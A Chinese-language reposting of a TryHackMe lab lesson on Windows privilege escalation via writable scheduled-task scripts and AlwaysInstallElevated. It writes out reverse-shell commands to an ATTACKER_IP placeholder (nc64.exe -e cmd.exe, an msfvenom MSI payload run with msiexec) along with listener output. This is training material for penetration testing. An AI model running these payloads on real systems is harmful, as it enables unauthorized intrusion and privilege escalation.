当前位置: 首页 > news >正文

【THM-课程内容】:Privilege Escalation-Windows Privilege Escalation: Other Quick Wins

news 2026/4/16 23:08:48

特权升级并不总是一个挑战。一些配置错误可能允许您获得更高权限的用户访问权限,在某些情况下甚至可以获得管理员访问权限。如果您认为这些更属于CTF事件的范畴,而不是您在实际渗透测试中遇到的场景,那将有所帮助。然而,如果前面提到的方法都不起作用,你总是可以回到以下这些方法。

计划任务
查看目标系统上的计划任务,您可能会看到一个计划任务丢失了二进制文件,或者它正在使用您可以修改的二进制文件。

可以使用schtasks命令从命令行列出计划任务,而不需要任何选项。要检索有关任何服务的详细信息,您可以使用以下命令:

C:\> schtasks /query /tn vulntask /fo list /v Folder: \ HostName: THM-PC1 TaskName: \vulntask Task To Run: C:\tasks\schtask.bat Run As User: taskusr1

您将获得有关任务的大量信息,但对我们来说重要的是“要运行的任务”参数,该参数指示计划任务执行的内容,以及“以用户身份运行”参数,它显示将用于执行任务的用户。

如果我们当前的用户可以修改或覆盖“要运行的任务”可执行文件,我们就可以控制taskusr1用户执行的内容,从而实现简单的权限升级。为了检查可执行文件的文件权限,我们使用icacls:

C:\> icacls c:\tasks\schtask.bat c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(F)

从结果中可以看出,BUILTIN\Users组对任务的二进制文件具有完全访问权限(F)。这意味着我们可以修改.bat文件并插入任何我们喜欢的有效载荷。为了您的方便,可以在C:\tools上找到nc64.exe。让我们更改bat文件以生成一个反向shell:

echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

然后,我们在攻击者机器上的反向shell上指示的同一端口上启动一个侦听器:

nc -lvp 4444

下次运行计划任务时,您应该收到具有taskusr1权限的反向shell。虽然您可能无法在真实场景中启动任务,并且必须等待计划任务触发,但我们为您的用户提供了手动启动任务的权限,以节省您的一些时间。我们可以使用以下命令运行任务:

C:\> schtasks /run /tn vulntask

您将收到具有taskusr1权限的反向shell,正如预期的那样:

user@attackerpc$ nc -lvp 4444 Listening on 0.0.0.0 4444 Connection received on 10.10.175.90 50649 Microsoft Windows [Version 10.0.17763.1821] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami wprivesc1\taskusr1

转到taskusr1桌面以检索标志。别忘了在任务结束时输入标志。

AlwaysInstallElevated

Windows安装程序文件(也称为.msi文件)用于在系统上安装应用程序。它们通常以启动它的用户的权限级别运行。但是,这些可以配置为从任何用户帐户(甚至是无权限的帐户)以更高的权限运行。这可能会让我们生成一个以管理员权限运行的恶意MSI文件。

注意:AlwaysInstallElevated方法在此房间的机器上不起作用,它仅作为信息提供。

此方法需要设置两个注册表值。您可以使用以下命令从命令行查询这些。

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

为了能够利用此漏洞,两者都应该设置。否则,剥削是不可能的。如果设置了这些,您可以使用msfvenom生成恶意.msi文件,如下所示:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

由于这是一个反向shell,您还应该运行相应配置的Metasploit Handler模块。传输创建的文件后,您可以使用以下命令运行安装程序并接收反向shell:

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
http://www.jsqmd.com/news/652423/

相关文章:

  • MCU驱动继电器的电路设计:从原理到实战避坑指南
  • Jasminum插件:中文文献管理的终极解决方案
  • 天赐范式第13天:科技项目实战篇2%轻掺杂实现热整流:混沌驱动的非线性声子玻璃(附A3级可视化+完整代码)
  • 保姆级教程:用Zemax 18.9复现单模光纤耦合仿真(附康宁SMF-28e参数)
  • 面试官: MySQL LIKE索引失效原因解析(答案深度解析)持续更新
  • SCI论文署名指南:通讯作者与共同通讯作者的权责与排序策略
  • 2026年4月昆明美术培训机构排名前十 - 云南美术头条
  • Java+YOLOv8+Redis实战:工业视觉检测缓存加速+实时数据同步,毫秒级生产级落地
  • 测试辅助工具__fiddler抓包基于windows下载安装及使用教程(详细版)
  • 2025届最火的六大降重复率方案推荐榜单
  • STM32 PWM模式全解析:从基础PWM到Combined PWM的进阶用法(避坑指南)
  • 深入解析特殊时序路径:从Unconstrained Path到False Path的实战策略
  • 2026年帮设计师快速生成交互流程的AI工具推荐:4款主流产品对比
  • 2026年值得关注的化妆学校,助力美妆梦想起航 - 品牌测评鉴赏家
  • 2026年AI搜索营销生成式优化领域核心服务商3强格局与能力洞察报告 - 商业小白条
  • 【AIGC生产环境生死线】:为什么传统RateLimiter在LLM调用中全面失灵?重写熔断器的3个底层协议适配关键点
  • 【项目实战】Windows 10 Docker Desktop 安装前置条件检测与解决方案
  • YOLOv8-Pose关键点检测实战:从图片到骨骼线绘制的保姆级避坑指南
  • 纯前端实现发票二维码批量识别——PDF.js + jsQR 实战
  • 图像质量评价指标全解析:SROCC、PLCC、KROCC到底怎么选?
  • 零基础学化妆|6家合规化妆培训参考,新手择校避坑指南 - 品牌测评鉴赏家
  • claude 安装配置手册
  • linux系统中简单统计python项目代码行数信息
  • NSCT图像分解实战:用Matlab+NSCT_TOOLBOX处理医学影像(附完整代码)
  • Markdown编辑器
  • 2026化妆培训十大机构盘点!零基础小白择校不踩坑! - 品牌测评鉴赏家
  • Python自动化查询DELL服务器保修信息:从SN号到完整报告(附多线程优化)
  • 2025届毕业生推荐的降AI率工具推荐
  • 别再瞎调参数了!GPT-5的reasoning_effort和verbosity到底怎么设?实战避坑指南
  • 避免数据丢失!双系统Ubuntu扩容必知的5个关键步骤与常见错误